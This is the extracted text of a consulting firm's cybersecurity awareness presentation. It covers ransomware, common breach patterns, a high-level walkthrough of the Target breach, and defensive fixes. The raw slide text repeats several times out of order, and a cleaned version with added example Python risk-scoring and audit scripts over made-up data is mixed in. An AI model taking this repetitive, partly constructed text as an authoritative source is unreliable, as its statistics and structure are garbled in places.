CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
CRIMEWARE (slide 32)
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and the use of backdoors are the most common occurrences of crimeware
• Crimeware is typically introduced through the following:
  - Email attachment
  - Cross-site scripting from a visited website
  - Email link
Source: Verizon Data Breach Investigations Report, 2016
KEY CYBER ATTACKS IN THE NEWS (slide 33)
• Target Data Breach – 70 million PII records of users and 40 million credit cards stolen
• Sony Attack – malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bank of Bangladesh (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK (slide 34)
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a third-party website used for submitting electronic invoices
• Injected code into a vulnerability in the electronic submission process to gain further access to Target's internal network
• Performed reconnaissance on the environment and obtained domain administrator access
• Attackers then worked their way through various servers, using a scanner to detect which other servers they could reach from their current location, working around firewalls and other defenses
COMPLEXITY BEHIND THE TARGET ATTACK (slide 35)
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off)
• Attackers then went on the darknet to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied the credit card files to another server that had remote FTP capability and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK (slide 36)
BARRIERS TO EFFECTIVE CYBERSECURITY (slide 37)
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons for companies' struggles are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH (slide 38)
PEOPLE | TECHNOLOGY | PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM (slide 39)
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE threat modeling to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks
Risk assessment steps:
  - Identification of assets
  - Asset locations
  - Classification of assets
  - Threat modeling
  - Calculated risk results
CYBERSECURITY RISK ASSESSMENT (slide 40)
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
  - Credit card data
  - Employee or customer records
  - Bank accounts
  - Intellectual property
  - Trade secrets
  - Insider knowledge
• Who would want the data?
• Data location
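The five assessment steps the deck lists (identification of assets, asset locations, classification of assets, STRIDE threat modeling, calculated risk results) can be turned into a small, repeatable calculation. The following is an added example, not Stinnett's own method or tooling: the 1-5 likelihood scale, the impact weights per classification, the likelihood uplift per location and the asset register are all constructed assumptions for illustration.

```python
"""Added example (not Stinnett's method or tooling): a semi-qualitative risk
calculation that walks the slide's five steps. Scales, weights and the asset
register are constructed assumptions."""
from dataclasses import dataclass, field

# Step 4 vocabulary: Microsoft's STRIDE threat categories.
STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information disclosure",
    "D": "Denial of service",
    "E": "Elevation of privilege",
}
# Step 3: assumed impact weight (1-5) per data classification.
IMPACT_BY_CLASS = {"public": 1, "internal": 2, "confidential": 4, "restricted": 5}
# Step 2: assumed likelihood uplift for more exposed locations.
LIKELIHOOD_BY_LOCATION = {"internal-only": 0, "vendor-hosted": 1, "internet-facing": 2}


@dataclass
class Asset:
    name: str                                    # step 1: identification
    location: str                                # step 2: where it lives
    classification: str                          # step 3: sensitivity class
    threats: dict = field(default_factory=dict)  # step 4: STRIDE letter -> base likelihood 1-5


def score_asset(asset):
    """Step 5: risk = likelihood x impact for each modelled threat.
    Likelihood is the analyst's base estimate plus the location uplift,
    capped at 5; impact is fixed by the classification."""
    impact = IMPACT_BY_CLASS[asset.classification]
    rows = []
    for letter, base in asset.threats.items():
        likelihood = min(5, base + LIKELIHOOD_BY_LOCATION[asset.location])
        rows.append({"asset": asset.name, "threat": STRIDE[letter],
                     "likelihood": likelihood, "impact": impact,
                     "risk": likelihood * impact})
    return rows


def prioritize(assets):
    """Calculated risk results: every asset/threat pair, highest risk first
    (ties broken by asset name, then threat name)."""
    rows = [row for a in assets for row in score_asset(a)]
    return sorted(rows, key=lambda r: (-r["risk"], r["asset"], r["threat"]))


def sample_register():
    """Constructed asset register for the demo (not real systems)."""
    return [
        Asset("e-commerce web app", "internet-facing", "confidential",
              {"S": 1, "T": 2, "I": 3, "D": 2}),
        Asset("POS card database", "internal-only", "restricted",
              {"I": 2, "E": 2}),
        Asset("marketing site", "vendor-hosted", "public", {"T": 2, "D": 3}),
        Asset("HR records share", "internal-only", "confidential", {"I": 1, "R": 1}),
    ]


if __name__ == "__main__":
    for row in prioritize(sample_register()):
        print(f"{row['risk']:>2}  {row['asset']:<20} {row['threat']}")
```

The output is the prioritized list the slide calls "calculated risk results": the internet-facing application holding confidential data tops the list, the walled-off card database comes next, and the public marketing site lands at the bottom. Re-running it after a change to the environment (a new internet-facing system, a reclassified data set) is how the "annually or on significant change" cadence on the previous slide becomes practical.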
BASELINE GAP ANALYSIS (slide 41)
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES (slide 42)
Patch Management – A patch management process is a company's strategy for ensuring that its IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures, which shows in the following:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and are therefore unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as much as possible. Within the IT department, the failure of least privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES (slide 43)
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
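Two of the fixes above, the device inventory with patch-risk assessment and the user/admin ID review with password parameters, lend themselves to a scripted baseline check that can be re-run before each audit. The code below is an added example, not part of the deck or Stinnett's tooling; the patch SLA thresholds, the password policy values, the high-risk software families and every inventory record are constructed assumptions.

```python
"""Added example (not from the Stinnett deck): baseline checks for two of the
slide's fixes - a patch-risk review of an IT device inventory and a
least-privilege / password-parameter review of admin IDs. All thresholds and
inventory records below are constructed assumptions for the demo."""
from datetime import date

# Assumed policy: internet-facing devices patched within 30 days, internal
# ones within 90 (the slide gives no numbers; these are illustrative).
PATCH_SLA_DAYS = {"internet-facing": 30, "internal": 90}
# Software families the slide singles out as having known vulnerabilities.
HIGH_RISK_SOFTWARE = {"adobe", "java", "browser", "os"}
# Assumed password parameters for privileged IDs.
MIN_PASSWORD_LENGTH = 14
MAX_PASSWORD_AGE_DAYS = 90
# Fixed "today" (the deck's date) so the results are reproducible.
TODAY = date(2017, 10, 27)


def patch_findings(devices, today=TODAY):
    """One finding per device whose newest patch is older than its
    exposure-based SLA; 'high' when the device is internet-facing and runs a
    high-risk software family, 'medium' otherwise. High findings sort first,
    then by days unpatched."""
    findings = []
    for d in devices:
        exposure = "internet-facing" if d["internet_facing"] else "internal"
        age = (today - d["last_patched"]).days
        if age > PATCH_SLA_DAYS[exposure]:
            high = d["internet_facing"] and d["software"] in HIGH_RISK_SOFTWARE
            findings.append({
                "device": d["name"],
                "exposure": exposure,
                "days_unpatched": age,
                "severity": "high" if high else "medium",
            })
    return sorted(findings, key=lambda f: (f["severity"] != "high", -f["days_unpatched"]))


def account_findings(accounts, today=TODAY):
    """Review admin IDs only: flag a missing justification for the admin
    right (least privilege) and password length/age outside the policy."""
    findings = []
    for a in accounts:
        if not a["admin"]:
            continue
        reasons = []
        if not a["justification"]:
            reasons.append("admin right not justified")
        if a["password_length"] < MIN_PASSWORD_LENGTH:
            reasons.append("password below minimum length")
        if (today - a["password_changed"]).days > MAX_PASSWORD_AGE_DAYS:
            reasons.append("password older than rotation interval")
        if reasons:
            findings.append({"id": a["id"], "reasons": reasons})
    return findings


def sample_devices():
    """Constructed device inventory (not real hosts)."""
    return [
        {"name": "web-01", "internet_facing": True, "software": "java", "last_patched": date(2017, 8, 1)},
        {"name": "fileserver-02", "internet_facing": False, "software": "os", "last_patched": date(2017, 9, 15)},
        {"name": "hr-db-03", "internet_facing": False, "software": "os", "last_patched": date(2017, 5, 1)},
        {"name": "vpn-04", "internet_facing": True, "software": "vpn-appliance", "last_patched": date(2017, 10, 10)},
    ]


def sample_accounts():
    """Constructed ID inventory (not real accounts)."""
    return [
        {"id": "jdoe", "admin": True, "justification": "domain admin, on-call rota",
         "password_length": 20, "password_changed": date(2017, 9, 1)},
        {"id": "svc_backup", "admin": True, "justification": "",
         "password_length": 8, "password_changed": date(2016, 1, 15)},
        {"id": "asmith", "admin": False, "justification": "",
         "password_length": 10, "password_changed": date(2016, 6, 1)},
        {"id": "temp_contractor", "admin": True, "justification": "",
         "password_length": 16, "password_changed": date(2017, 10, 1)},
    ]


if __name__ == "__main__":
    for f in patch_findings(sample_devices()):
        print("PATCH  ", f)
    for f in account_findings(sample_accounts()):
        print("ACCOUNT", f)
```

The device check deliberately ranks the internet-facing Java host above the internal database that has gone far longer without patches, which is the "focus on higher-risk areas" fix in practice; the account check surfaces the service account that fails all three parameters, the kind of ID the slide's least-privilege point is about. The inputs here are hand-built, but the same two functions work over an export from an asset-management or directory tool.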
QUESTIONS (slide 44)
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300, Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com
MALWARE (slide 25)
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest version of malware to be in the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report, 2016
RANSOMWARE (slide 26)
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• Bitcoin is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)
COMMON CYBER ATTACK PATTERNS (slide 27)
• 78% of all breaches result from these 5 attack patterns:
  - Web App Attacks
  - POS Intrusions
  - Privilege Misuse
  - Cyber-espionage
  - Crimeware
• 63% of all breaches are attributable to the top 2 alone
Common attack patterns account for a vast majority of documented breaches.
Source: Verizon Data Breach Investigations Report, 2016
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
